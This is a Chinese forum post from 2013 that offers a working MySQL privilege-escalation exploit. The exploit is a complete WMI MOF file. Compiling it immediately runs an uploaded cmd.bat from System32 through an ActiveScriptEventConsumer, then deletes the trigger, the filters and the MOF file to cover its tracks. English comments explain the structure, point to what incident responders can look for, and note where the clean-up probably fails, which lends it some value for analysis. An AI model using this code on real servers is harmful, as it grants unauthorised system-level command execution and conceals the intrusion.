标题:
Mysql 提权即时无错Mof exp
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个 SQL 提权 MOF 需要运行 system 目录下的文件，不能自定义路径。
需要把要运行的命令写入 bat 文件，上传到 system32 目录后再执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// WMI permanent event subscription, compiled by mofcomp into root\cimv2.
// Structure: a trigger class (MyClass547), a local registration of the
// ActiveScriptEventConsumer provider, two JScript consumers, two __EventFilter
// queries and two __FilterToConsumerBinding instances joining them, plus one
// MyClass547 instance whose creation fires the first filter as soon as the
// file is compiled. Everything here is persisted in the WMI repository, so the
// filter / consumer / binding triad is enumerable after the fact and is the
// artifact a responder should look for.
#pragma namespace("\\\\.\\root\\cimv2")

// Trigger class: exists only so that creating an instance of it raises the
// __InstanceCreationEvent matched by $Filt below.
class MyClass547
{
    [key] string Name;
};

// Local declaration of the script consumer class. ActiveScriptEventConsumer is
// normally provided in root\subscription; declaring and registering it inside
// root\cimv2 (next two instances) is unusual and is itself an indicator.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider registration for the script consumer. The CLSID is the one the
// built-in scripting consumer is registered under; PerUserInitialization = TRUE
// requests per-user initialisation of the provider.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

// Ties the provider above to the consumer class name so WMI will instantiate it.
instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Consumer 1 ("ASEC"): runs cmd.bat through WScript.Shell, then deletes the
// trigger class, the "instfilt" filter and itself from root\cimv2. "cmd.bat" is
// a relative path, so it resolves against the working directory of the WMI
// host process (presumably %SystemRoot%\System32 -- which is why the post says
// the batch file has to be placed there). Every step is wrapped in try/catch,
// so any failure is silent. The __FilterToConsumerBinding instances are not
// deleted by this script.
Instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Consumer 2 ("qndASEC"): clean-up. Deletes the compiled copy of this MOF --
// hard-coded as wbem\mof\good\hBsBa.mof, i.e. it assumes the file was dropped
// under that name and that the auto-compile step moved it to the "good"
// sub-directory; any other name leaves the compiled MOF on disk because the
// error is swallowed -- then deletes cmd.bat, the "qndfilt" filter and itself.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Filter 1: matches creation of any MyClass547 instance. It is satisfied by
// $MyClass at the bottom of this file, which is what makes the payload run at
// compile time rather than on some later event.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Filter 2: intended to fire when a process named "cmd.bat" disappears.
// Win32_Process.Name is the image name of the executable, so a batch file
// started via WScript.Shell most likely appears as cmd.exe and this filter may
// never match -- in which case the qndASEC consumer, the qndfilt filter,
// cmd.bat and the compiled MOF all stay behind for a responder to find.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Binding 1: instfilt -> ASEC (payload).
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

// Binding 2: qndfilt -> qndASEC (clean-up).
instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// The trigger: compiling this instance raises the __InstanceCreationEvent that
// $Filt matches, so the first consumer runs immediately.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};